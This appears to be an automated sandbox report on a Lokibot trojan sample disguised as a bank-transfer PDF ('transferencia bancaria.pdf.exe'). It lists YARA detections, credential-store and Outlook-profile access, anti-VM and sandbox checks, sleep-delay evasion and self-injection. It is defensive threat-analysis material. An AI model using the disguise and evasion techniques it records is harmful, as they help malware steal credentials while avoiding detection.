                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
                  Source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                  Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTRMatched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A3B98
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031AC5F4
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A484F
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031AEFD8
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031AEFC8
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A6D23
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeCode function: 0_2_031A6CD0
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.287796129.00000000033AD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.295805972.00000000078E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameCollins.dll8 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000000.249144170.0000000000F42000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.277771631.0000000003311000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWise.dll6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exeBinary or memory string: OriginalFilenameXwux.exe6 vs transferencia bancaria.pdf.exe
                  Source: transferencia bancaria.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: transferencia bancaria.pdf.exeReversingLabs: Detection: 12%
                  Source: transferencia bancaria.pdf.exeVirustotal: Detection: 20%
                  Source: transferencia bancaria.pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: unknownProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\transferencia bancaria.pdf.exe.logJump to behavior
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/3@40/1
                  Source: transferencia bancaria.pdf.exe, 00000001.00000003.276188616.0000000000B77000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                  Source: transferencia bancaria.pdf.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
                  Source: transferencia bancaria.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: transferencia bancaria.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: transferencia bancaria.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                  Data Obfuscation

                  barindex
                  Source: Yara matchFile source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.442b890.12.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR
                  Source: transferencia bancaria.pdf.exe, Form1.cs.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: 0.0.transferencia bancaria.pdf.exe.f40000.0.unpack, Form1.cs.Net Code: QWERTYSDFGHJK System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                  Source: transferencia bancaria.pdf.exeStatic PE information: 0xA9237CA5 [Wed Dec 3 11:06:13 2059 UTC]
                  Source: initial sampleStatic PE information: section name: .text entropy: 6.915983824184794

                  Hooking and other Techniques for Hiding and Protection

                  barindex
                  Source: Possible double extension: pdf.exeStatic PE information: transferencia bancaria.pdf.exe
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess information set: NOGPFAULTERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 2372Thread sleep time: -42186s >= -30000s
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 6116Thread sleep time: -922337203685477s >= -30000s
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe TID: 5156Thread sleep time: -300000s >= -30000s
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 42186
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeThread delayed: delay time: 60000
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.291185342.000000000445F000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.295985554.0000000007AA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: HoR6YLHHGFsobhrR7rF
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                  Source: transferencia bancaria.pdf.exe, 00000000.00000002.289674735.0000000003592000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeMemory written: C:\Users\user\Desktop\transferencia bancaria.pdf.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exeProcess created: C:\Users\user\Desktop\transferencia bancaria.pdf.exe C:\Users\user\Desktop\transferencia bancaria.pdf.exe
